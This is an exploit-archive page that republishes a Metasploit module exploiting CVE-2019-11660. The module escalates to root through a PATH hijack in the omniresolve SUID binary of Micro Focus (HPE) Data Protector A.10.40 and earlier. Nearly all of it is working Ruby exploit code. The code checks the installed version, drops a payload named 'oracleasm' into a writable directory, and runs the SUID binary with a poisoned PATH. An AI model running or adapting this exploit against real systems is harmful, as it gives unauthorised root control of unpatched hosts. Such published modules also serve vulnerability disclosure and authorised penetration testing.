what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Micro Focus (HPE) Data Protector SUID Privilege Escalation

Micro Focus (HPE) Data Protector SUID Privilege Escalation
Posted Nov 1, 2019
Authored by s7u55 | Site metasploit.com

This Metasploit module exploits the trusted $PATH environment variable of the SUID binary omniresolve in Micro Focus (HPE) Data Protector versions A.10.40 and below. The omniresolve executable calls the oracleasm binary using a relative path and the trusted environment $PATH, which allows an attacker to execute a custom binary with root privileges.

tags | exploit, root
advisories | CVE-2019-11660
SHA-256 | 197967db244e27202009402db1e1d26c3d47f8f13b8233e38059fe7d6f165aa2

Micro Focus (HPE) Data Protector SUID Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
'Description' => %q{
This module exploits the trusted `$PATH` environment
variable of the SUID binary `omniresolve` in
Micro Focus (HPE) Data Protector A.10.40 and prior.

The `omniresolve` executable calls the `oracleasm` binary using
a relative path and the trusted environment `$PATH`, which allows
an attacker to execute a custom binary with `root` privileges.

This module has been successfully tested on:
HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

The vulnerability has been patched in:
Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
},
'License' => MSF_LICENSE,
'Author' =>
[
's7u55', # Discovery and Metasploit module
],
'DisclosureDate' => '2019-09-13',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[
'Micro Focus (HPE) Data Protector <= 10.40 build 118',
upper_version: Gem::Version.new('10.40')
]
],
'DefaultOptions' =>
{
'PrependSetgid' => true,
'PrependSetuid' => true
},
'References' =>
[
[ 'CVE', '2019-11660' ],
[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
]
))

register_options(
[
OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
])

register_advanced_options(
[
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end

def base_dir
datastore['WritableDir'].to_s
end

def suid_bin_path
datastore['SUID_PATH'].to_s
end

def check
unless setuid? suid_bin_path
vprint_error("#{suid_bin_path} executable is not setuid")
return CheckCode::Safe
end

info = cmd_exec("#{suid_bin_path} -ver").to_s
if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
version = '%.2f' % $1.to_f
build = $3.to_i
vprint_status("omniresolve version #{version} build #{build}")

unless Gem::Version.new(version) < target[:upper_version] ||
(Gem::Version.new(version) == target[:upper_version] && build <= 118)
return CheckCode::Safe
end

return CheckCode::Appears
end

vprint_error("Could not parse omniresolve -ver output")
CheckCode::Detected
end

def exploit
if check == CheckCode::Safe
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end

if is_root?
unless datastore['ForceExploit']
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
end

unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end

payload_path = File.join(base_dir, 'oracleasm')
register_file_for_cleanup(payload_path)
write_file(payload_path, generate_payload_exe)
chmod(payload_path)

trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
register_file_for_cleanup(trigger_path)
write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
end
end
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close